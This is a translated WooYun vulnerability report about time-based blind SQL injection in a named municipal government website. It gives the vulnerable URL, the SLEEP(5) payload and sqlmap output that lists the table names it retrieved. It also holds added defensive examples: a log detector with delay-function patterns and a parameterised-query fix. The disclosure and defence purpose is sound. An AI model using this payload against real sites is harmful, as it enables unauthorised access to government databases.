Vulnerability summary (24 followers)

Defect ID: wooyun-2015-095946

Title: SQL injection in the Zunyi Administration for Industry and Commerce website (遵义市工商行政管理局)

Vendor: cncert

Author: ucifer

Submitted: 2015-02-06 17:40

Fix time: 2015-03-23 17:42

Published: 2015-03-23 17:42

Type: SQL injection

Severity: Medium

Self-assessed Rank: 6

Status: Handed to a third-party partner (CNCERT, National Computer Network Emergency Response Technical Team) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-02-06: Details sent to the vendor; awaiting vendor handling
2015-02-11: Vendor confirmed; details disclosed to the vendor only
2015-02-21: Details disclosed to core white hats and relevant domain experts
2015-03-03: Details disclosed to regular white hats
2015-03-13: Details disclosed to intern white hats
2015-03-23: Details disclosed to the public

Summary:

As the title says.

Details:

http://www.zyaic.gov.cn/include/Viewer/Viewer.php?aid=1
The aid parameter is vulnerable to time-based blind SQL injection.

[Screenshot: QQ截图20150206020101.png]


Place: GET
Parameter: aid
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: aid=1 AND SLEEP(5)
---
[01:56:51] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: ASP.NET, PHP 5.3.29
back-end DBMS: MySQL 5.0.11
[01:56:51] [INFO] fetching tables for database: 'zyaic'
[01:56:51] [INFO] fetching number of tables for database 'zyaic'
[01:56:51] [WARNING] time-based comparison requires larger statistical model, please wait..............................
[01:57:02] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[01:57:03] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[01:57:03] [WARNING] unable to retrieve the number of tables for database 'zyaic'
[01:57:03] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] y
[01:57:07] [INFO] checking table existence using items from '/usr/share/sqlmap/txt/common-tables.txt'
[01:57:07] [INFO] adding words used on web page to the check list
[01:57:44] [INFO] tried 81/3319 items (2%)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[01:57:57] [INFO] retrieved: topics
[01:59:05] [INFO] retrieved: pma_history
[01:59:57] [INFO] tried 339/3319 items (10%)
[01:59:58] [INFO] adjusting time delay to 2 seconds due to good response times
[01:59:58] [INFO] retrieved: CurrentUsers
[02:00:02] [INFO] retrieved: vcd_IMDB
[02:00:53] [INFO] retrieved: vcd_Covers
[02:01:16] [INFO] retrieved: DUMMY
[02:02:39] [INFO] retrieved: cmPublicationDetail
[02:02:49] [INFO] retrieved: phpbb_topics
[02:03:47] [INFO] retrieved: guava_roles
[02:03:58] [INFO] retrieved: jos_components
[02:04:34] [INFO] retrieved: document
[02:06:15] [INFO] retrieved: EthnicGroup
[02:07:48] [INFO] retrieved: adv
[02:09:35] [INFO] retrieved: jforum_forums
[02:10:38] [INFO] retrieved: jos_newsfeeds
[02:11:21] [INFO] retrieved: admin_user
[02:12:14] [INFO] retrieved: reguser
[02:12:49] [INFO] retrieved: ActiveDataFeed
[02:13:06] [INFO] retrieved: States
[02:13:25] [INFO] retrieved: tblNews
[02:13:26] [INFO] retrieved: tblOrders
[02:17:07] [INFO] retrieved: oil_biolmed_land
[02:17:31] [INFO] retrieved: oil_core_acl_aro_groups
[02:17:49] [INFO] retrieved: spip_messages
[02:18:28] [INFO] retrieved: nuke_main
[02:18:34] [INFO] retrieved: nuke_bbwords
[02:20:42] [INFO] retrieved: studierende
[02:20:52] [INFO] retrieved: tx_tcdirectmail_sentlog
[02:22:34] [INFO] retrieved: DEPARTAMENTOS
[02:22:49] [INFO] retrieved: cdb_creditslog
[02:23:25] [INFO] retrieved: pw_msg
[02:23:44] [INFO] retrieved: pw_members

Database: zyaic
[32 tables]
+-------------------------+
| ActiveDataFeed |
| CurrentUsers |
| DEPARTAMENTOS |
| DUMMY |
| EthnicGroup |
| States |
| admin_user |
| adv |
| cdb_creditslog |
| cmPublicationDetail |
| document |
| guava_roles |
| jforum_forums |
| jos_components |
| jos_newsfeeds |
| nuke_bbwords |
| nuke_main |
| oil_biolmed_land |
| oil_core_acl_aro_groups |
| phpbb_topics |
| pma_history |
| pw_members |
| pw_msg |
| reguser |
| spip_messages |
| studierende |
| tblNews |
| tblOrders |
| topics |
| tx_tcdirectmail_sentlog |
| vcd_Covers |
| vcd_IMDB |
+-------------------------+
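The sqlmap run above leaves traces in the target's own access logs, and that is where a defender would look for this kind of probing. The following is an added example, not part of the WooYun report: it flags individual requests whose query string carries a delay primitive such as SLEEP(5), and a burst of such requests from one client against one script, which is what the table-name guessing in the log looks like from the server side. It assumes Apache combined log format with a trailing response time in microseconds (%D); the log lines are constructed with TEST-NET addresses, and only the request path comes from the report. The delay regex generalises beyond MySQL's SLEEP() to the equivalents on other common DBMSs.

```python
"""Flag time-based blind SQL injection probing in web server access logs.

Added example for the finding above; it is not part of the WooYun report.
Assumptions: Apache combined log format with a trailing response time in
microseconds (%D); the log lines below are constructed, with TEST-NET
addresses, and only the request path comes from the report.
"""
import re
from collections import Counter
from urllib.parse import unquote_plus

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*" (?P<usec>\d+)$'
)

# Delay primitives used for time-based blind injection on common DBMSs.
DELAY_RE = re.compile(
    r"\b(sleep|benchmark|pg_sleep|dbms_lock\.sleep)\s*\(|waitfor\s+delay",
    re.IGNORECASE,
)

SLOW_USEC = 2_000_000   # 2 s: the delay sqlmap settled on in the report
BURST_THRESHOLD = 3     # flagged requests from one client to one script

# Constructed sample log (not real traffic); 203.0.113.7 plays the scanner.
SAMPLE_LOG = [
    '203.0.113.7 - - [06/Feb/2015:01:56:40 +0800] "GET /include/Viewer/Viewer.php?aid=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0" 84000',
    '203.0.113.7 - - [06/Feb/2015:01:56:51 +0800] "GET /include/Viewer/Viewer.php?aid=1%20AND%20SLEEP(5) HTTP/1.1" 200 5120 "-" "Mozilla/5.0" 5091000',
    '203.0.113.7 - - [06/Feb/2015:01:57:57 +0800] "GET /include/Viewer/Viewer.php?aid=1+AND+SLEEP(5) HTTP/1.1" 200 5120 "-" "Mozilla/5.0" 5077000',
    '203.0.113.7 - - [06/Feb/2015:01:59:58 +0800] "GET /include/Viewer/Viewer.php?aid=1%20AND%20sleep%282%29 HTTP/1.1" 200 5120 "-" "Mozilla/5.0" 2043000',
    '198.51.100.9 - - [06/Feb/2015:02:10:00 +0800] "GET /include/Viewer/Viewer.php?aid=2%20AND%20SLEEP(5) HTTP/1.1" 200 5120 "-" "curl/7.38.0" 5010000',
    'this line is deliberately malformed and must be skipped',
]


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    entry["usec"] = int(entry["usec"])
    # Decode once so %20 / + / %28 cannot hide the payload from the regex.
    entry["decoded"] = unquote_plus(entry["path"])
    return entry


def is_time_based_probe(entry):
    """Payload check: a delay primitive anywhere in the decoded request."""
    return DELAY_RE.search(entry["decoded"]) is not None


def analyse(lines):
    """Return (hits, bursts).

    hits   - one dict per request carrying a delay primitive
    bursts - {(ip, script): count} for clients reaching BURST_THRESHOLD
    """
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None or not is_time_based_probe(entry):
            continue
        script, _, query = entry["decoded"].partition("?")
        hits.append({
            "ip": entry["ip"],
            "ts": entry["ts"],
            "script": script,
            "query": query,
            # A slow response corroborates that the injected delay ran.
            "slow": entry["usec"] >= SLOW_USEC,
        })
    counts = Counter((h["ip"], h["script"]) for h in hits)
    bursts = {key: n for key, n in counts.items() if n >= BURST_THRESHOLD}
    return hits, bursts


if __name__ == "__main__":
    found, repeated = analyse(SAMPLE_LOG)
    for h in found:
        print(f'{h["ts"]} {h["ip"]} {h["script"]}?{h["query"]} slow={h["slow"]}')
    for (ip, script), n in repeated.items():
        print(f"burst: {n} delay probes from {ip} against {script}")
```

The per-request check and the per-client count are kept separate on purpose: a single SLEEP() in a query string is already worth a ticket, while the burst is what distinguishes an automated enumeration run from a one-off test, and the response time lets the analyst confirm the injection actually executed rather than being blocked.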

Proof:

Proven.

Suggested fix:

Input filtering.

Copyright: please credit ucifer@乌云 (WooYun) when reposting.
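"Filtering" is the whole of the suggested fix, so it is worth spelling out what that should mean for a parameter like aid. The following is an added example, not code from the report or from the affected site: the vulnerable concatenation pattern beside a hardened version that allow-lists the parameter as a positive integer and then binds it as a query parameter. The original application is PHP on MySQL; this uses Python with an in-memory SQLite database as a stand-in, and the table and column names are constructed for the example.

```python
"""Hardened handling of an integer id parameter (added example).

Not code from the WooYun report or the affected site. Assumptions: Python
and in-memory SQLite stand in for the site's PHP/MySQL stack; the table
`article` and its columns are constructed for the example.
"""
import re
import sqlite3

_ID_RE = re.compile(r"^[1-9][0-9]{0,9}$")  # positive integer, bounded length


def parse_id(raw):
    """Strict allow-list validation for an id parameter.

    Accepts only a decimal positive integer; anything else, including the
    report's payload "1 AND SLEEP(5)", is rejected before reaching the DB.
    """
    if not isinstance(raw, str) or _ID_RE.match(raw) is None:
        raise ValueError("aid must be a positive integer")
    return int(raw)


def make_db():
    """Constructed sample data standing in for the site's article table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE article (aid INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO article VALUES (?, ?)",
        [(1, "first notice"), (2, "second notice")],
    )
    return conn


def fetch_article_unsafe(conn, raw_aid):
    """The vulnerable pattern: the parameter is concatenated into the SQL.

    With the report's payload the database is asked to evaluate SLEEP(5);
    SQLite has no such function and raises OperationalError, which shows
    the attacker-controlled text reached the SQL parser as code.
    """
    sql = "SELECT aid, title FROM article WHERE aid = " + raw_aid
    return conn.execute(sql).fetchall()


def fetch_article_safe(conn, raw_aid):
    """Validation plus a bound parameter; the value can only ever be data."""
    aid = parse_id(raw_aid)
    return conn.execute(
        "SELECT aid, title FROM article WHERE aid = ?", (aid,)
    ).fetchall()


def classify(conn, raw_aid):
    """Summarise how each version treats one input."""
    try:
        fetch_article_unsafe(conn, raw_aid)
        unsafe = "executed"
    except sqlite3.OperationalError:
        unsafe = "error: treated as SQL"
    try:
        fetch_article_safe(conn, raw_aid)
        safe = "served"
    except ValueError:
        safe = "rejected"
    return f"unsafe={unsafe} safe={safe}"


if __name__ == "__main__":
    db = make_db()
    for value in ["1", "1 AND SLEEP(5)", "abc"]:
        print(repr(value), "->", classify(db, value))
```

Either half alone would have been enough to stop this finding; together they also give a clean place to log rejected values, which turns the scanner's probing into an alert instead of a silent delay.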


Vendor response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-02-11 13:51

Vendor reply:

CNVD did not directly reproduce the described issue. The report was compiled into a notification based on the reporter's description and forwarded through CNCERT to the Guizhou branch centre, which will coordinate handling with the organisation operating the website.

Latest status:

None yet